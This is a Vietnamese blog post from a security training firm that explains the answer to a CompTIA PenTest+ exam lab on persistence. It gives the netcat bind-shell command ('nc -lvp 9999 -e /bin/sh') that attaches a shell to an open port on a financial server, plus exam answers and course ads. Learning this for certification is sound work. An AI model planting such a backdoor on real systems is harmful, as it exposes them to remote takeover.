Trong bài thi CompTIA PenTest+ (PT0-003), các câu hỏi Performance-Based Questions (PBQ) đòi hỏi bạn không chỉ nắm vững lý thuyết mà còn phải có tư duy thực chiến để xử lý các tình huống giả định. Dưới đây là phần bóc tách chi tiết cho kịch bản Maintain Persistence (Duy trì quyền truy cập).

1. Phân Tích Bối Cảnh (Scenario)

Một tổ chức tài chính đã thuê bạn kiểm thử mạng lưới để đánh giá các chính sách và thiết lập bảo mật. Mục tiêu của bạn là tạo một backdoor (cửa hậu) vào một trong các máy chủ tài chính (Financial Server) và vẽ lại sơ đồ đường dẫn giao tiếp.

Dữ liệu đầu vào đã cho:

  • IP máy trạm của PenTester (Attacker): 192.168.100.122
  • Danh sách IP Financial server (Target): 192.168.100.144, 10.100.101.55, 10.200.102.50
  • Cổng kiểm thử (Port Channel): 9999
  • Điều kiện cốt lõi: Chọn mục tiêu dễ dàng nhất (easiest target) trong danh sách để bắt đầu.

2. Giải Pháp Xử Lý Chi Tiết (Solution)

Dựa vào các thông số trên, đây là đáp án chính xác cho từng trường dữ liệu trong bài lab:

A. Cấu hình Terminal (Dòng lệnh)

  • Terminal 1 (Root@target – Máy chủ mục tiêu):
    • nc -lvp 9999 -e /bin/sh
    • listening on [any] 9999 ...
  • Terminal 2 (Root@attacker – Máy trạm tấn công):
    • nc 192.168.100.144 9999
    • Connect to [ 192.168.100.144 ] from (UNKNOWN) [ 192.168.100.122 ]

B. Câu hỏi trắc nghiệm (Questions)

  • What tool is this test using? (Công cụ nào đang được sử dụng?): Netcat
  • What type of persistent attack are you testing? (Loại tấn công duy trì nào đang được kiểm thử?): Bind Shell

C. Sơ đồ các bên liên quan (Stakeholder Diagram)

  • Node #1:
    • Device: PenTester Workstation
    • IP Address: 192.168.100.122
  • Node #2:
    • Device: Financial Server
    • IP Address: 192.168.100.144
    • Listener Port: 9999

3. Giải Thích Chuyên Sâu (Reasoning)

Để thực sự làm chủ kiến thức, chúng ta cần hiểu rõ tại sao lại điền các thông số như vậy:

  • Tại sao chọn IP Target là 192.168.100.144?Đề bài yêu cầu chọn mục tiêu “dễ dàng nhất”. Máy trạm của bạn có IP 192.168.100.122. Trong số các IP máy chủ tài chính, IP 192.168.100.144 nằm cùng subnet (mạng con) với bạn. Tấn công các thiết bị trong cùng mạng nội bộ luôn dễ dàng hơn vì không phải đi qua các lớp định tuyến (routing) phức tạp hay bị Firewall ngăn chặn từ bên ngoài.
  • Tại sao đây là Bind Shell (mà không phải Reverse Shell)?
    • Bind Shell: Máy mục tiêu (Target) mở một cổng (listening port) và đính kèm (bind) một shell (như /bin/sh hoặc cmd.exe) vào cổng đó. Kẻ tấn công chủ động kết nối đến cổng đang mở này. (Đúng với tình huống: Target chạy nc -lvp... và Attacker chạy nc [IP Target]).
    • Reverse Shell: Ngược lại, máy mục tiêu sẽ là bên chủ động gọi kết nối (reverse) về máy của kẻ tấn công đang mở cổng chờ sẵn.
  • Nhận diện Netcat:Câu lệnh nc là viết tắt của Netcat, một công cụ kinh điển được mệnh danh là “Swiss Army knife” (dao Thụy Sĩ) của giới mạng và bảo mật, thường dùng để đọc/ghi dữ liệu qua kết nối mạng sử dụng giao thức TCP/UDP.

Nâng Tầm Kỹ Năng Penetration Testing Cùng Security365

Bạn muốn chinh phục hoàn toàn các dạng bài PBQ hóc búa và xây dựng tư duy thực chiến sắc bén? Hãy tham gia ngay Khóa Học CompTIA PENTEST+ tại Security365.

👉 Đăng ký và tìm hiểu chi tiết tại: https://security365.vn/comptia-pentest/

Security365 – Đối tác đào tạo ủy quyền uy tín

  • Email: contact@security365.vn
  • Zalo Hotline: 0914433338
  • Địa chỉ: 118 Hùng Vương, Buôn Ma Thuột

Previous Post
Next Post

CEH v13 – CHFI v11 EXAMPREP BOOTCAMP | Luyện thi cấp tốc, lấy chứng chỉ chỉ trong 1 tuần!

🔥 Đặc biệt tại TP.HCM:
Các lớp luyện thi cấp tốc nguyên ngày Thứ 7 & Chủ Nhật khai giảng vào ngày 15 hàng tháng, phù hợp cho người đi làm và cần lấy chứng chỉ nhanh.

🎯 Phù hợp cho Pentester, SOC Analyst, Blue Team, Incident Response, Digital Forensics và các chuyên gia an ninh mạng muốn nâng cấp sự nghiệp với chứng chỉ EC-Council quốc tế.

~ Liên hệ Zalo CertMaster – Zalo 0914433339